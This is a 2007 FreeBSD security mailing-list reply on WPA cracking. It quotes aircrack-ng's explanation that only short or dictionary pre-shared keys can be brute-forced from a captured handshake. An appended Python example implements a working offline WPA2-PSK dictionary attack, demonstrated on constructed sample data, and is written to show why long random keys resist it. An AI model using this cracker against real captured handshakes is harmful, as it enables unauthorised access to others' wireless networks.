Date: Tue, 20 Nov 2007 07:56:38 -0600
From: Josh Paetzel <josh@tcbug.org>
To: freebsd-security@freebsd.org
Cc: "Mark D. Foster" <mark@foster.cc>
Subject: Re: testing wireless security
Message-ID: <200711200756.42344.josh@tcbug.org>
In-Reply-To: <4742225B.6020107@foster.cc>
References: <200711191643.lAJGh3jb027972@lava.sentex.ca> <200711191321.44398.josh@tcbug.org> <4742225B.6020107@foster.cc>
On Monday 19 November 2007 05:55:07 pm Mark D. Foster wrote:
> Josh Paetzel wrote:
> > When I looked into this it seemed that the current state of affairs is
> > that WPA can only be broken by brute-forcing the key. I don't recall if
> > that could be done 'off-line' or not. My memory is that the needed info
> > to attempt brute-forcing could be obtained by simply receiving....no need to
> > attempt to associate to the AP was needed. I'm not really interested in
> > disseminating links to tools that can be used to break wireless security,
> > but simple google searches will give you the info you need.....and the
> > tools are in the ports tree for the most part.
> >
> > Fortunately WPA allows keys that put even resource-rich attackers into
> > the decade range to brute-force.
>
> That would not appear to be a limitation of aircrack-ng
> http://www.freshports.org/net-mgmt/aircrack-ng/
>
> aircrack is an 802.11 WEP and WPA-PSK key cracking program that can
> recover these keys once enough encrypted packets have been captured.
> It implements the standard FMS attack along with some optimizations
> like KoreK attacks, thus making the attack much faster compared to
> other WEP cracking tools. In fact aircrack is a set of tools for
> auditing wireless networks.
>
> That said, I haven't (yet) tried it myself ;)

Well, if you were to read your own link for a bit you'd eventually find...

http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Quoting from the page....

WPA/WPA2 supports many types of authentication beyond pre-shared keys.
aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows
the network as having the authentication type of PSK, otherwise, don't bother
trying to crack it.

There is another important difference between cracking WPA/WPA2 and WEP. This
is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where
statistical methods can be used to speed up the cracking process, only plain
brute force techniques can be used against WPA/WPA2. That is because the key
is not static, so collecting IVs as when cracking WEP encryption does not
speed up the attack. The only thing that does give the information to start
an attack is the handshake between client and AP. Handshaking is done when
the client connects to the network. Although not absolutely true, for the
purposes of this tutorial, consider it true. Since the pre-shared key can be
from 8 to 63 characters in length, it effectively becomes impossible to crack
the pre-shared key.

The only time you can crack the pre-shared key is if it is a dictionary word
or relatively short in length. Conversely, if you want to have an unbreakable
wireless network at home, use WPA/WPA2 and a 63 character password composed
of random characters including special symbols.

--
Thanks,

Josh Paetzel
PGP: 8A48 EF36 5E9F 4EDA 5A8C 11B4 26F9 01F1 27AF AECB
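The offline dictionary attack the quoted aircrack-ng page describes, written out as an added example (this is not code from the thread, from aircrack-ng, or from FreeBSD): each candidate passphrase is mapped to a PMK with PBKDF2-HMAC-SHA1 over the SSID, expanded to a PTK with the MAC addresses and nonces taken from the captured four-way handshake, and confirmed by recomputing the Key MIC on message 2. Everything the attacker would sniff is constructed inline here: the SSID, the two MAC addresses, the nonces, a minimal EAPOL-Key message 2 layout assumed for the example, and a tiny wordlist. The MIC is the WPA2 key-descriptor-version-2 variant (HMAC-SHA1 truncated to 16 bytes); WPA/TKIP uses HMAC-MD5 instead, which is not shown.

```python
import hashlib
import hmac

# Offset of the 16-byte Key MIC field inside an EAPOL-Key frame:
# 4 (EAPOL header) + 1 (descriptor type) + 2 (key info) + 2 (key length)
# + 8 (replay counter) + 32 (nonce) + 16 (key IV) + 8 (key RSC) + 8 (key ID)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK mapping: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Expand the PMK to the PTK (PRF-384 for CCMP) and return the KCK, its first 16 bytes."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key MIC for key descriptor version 2 (WPA2): HMAC-SHA1 over the frame with the MIC field zeroed."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol, wordlist):
    """Offline dictionary attack: return the candidate whose MIC matches the capture, else None."""
    target = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:  # outside the legal PSK length range, skip
            continue
        pmk = pmk_from_passphrase(candidate, ssid)   # the expensive step: 4096 PBKDF2 rounds
        kck = kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol), target):
            return candidate
    return None


# --- constructed sample "capture" (not real traffic) ---------------------------
SSID = "home-net"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
WORDLIST = ["password", "letmein1", "sunshine12", "qwertyuiop"]
# A 63-character PSK of printable ASCII including symbols, generated deterministically.
STRONG_PSK = "".join(chr(33 + (i * 7) % 94) for i in range(63))


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal message 2 of the 4-way handshake (field layout assumed for this example)."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: version 2, pairwise, MIC present
            + b"\x00\x00"                # key length
            + b"\x00" * 7 + b"\x01"      # replay counter
            + snonce + b"\x00" * 16      # SNonce, key IV
            + b"\x00" * 8 + b"\x00" * 8  # key RSC, key ID
            + mic + b"\x00\x00")         # key MIC, key data length
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def make_handshake(passphrase: str) -> bytes:
    """Build a message 2 carrying a valid MIC for the given passphrase."""
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return build_eapol_msg2(SNONCE, eapol_mic(kck, build_eapol_msg2(SNONCE)))


def demo():
    """A dictionary passphrase is recovered; the 63-character random PSK is not."""
    weak = make_handshake("sunshine12")
    strong = make_handshake(STRONG_PSK)
    return (crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, weak, WORDLIST),
            crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, strong, WORDLIST))


if __name__ == "__main__":
    print(demo())  # ('sunshine12', None)
```

Two things in this code back up the quoted page. Nothing beyond the single handshake is needed: no association, no traffic volume, no IV collection, because the MIC check is a pure offline computation. And the cost per guess is fixed by PBKDF2 at 4096 rounds (8192 HMAC-SHA1 calls for the 32-byte PMK) plus the PTK expansion, so the attack scales only with the size of the candidate space; a 63-character passphrase drawn from the 94 printable ASCII characters lies far outside any wordlist or brute-force budget, which is why only short or dictionary keys fall.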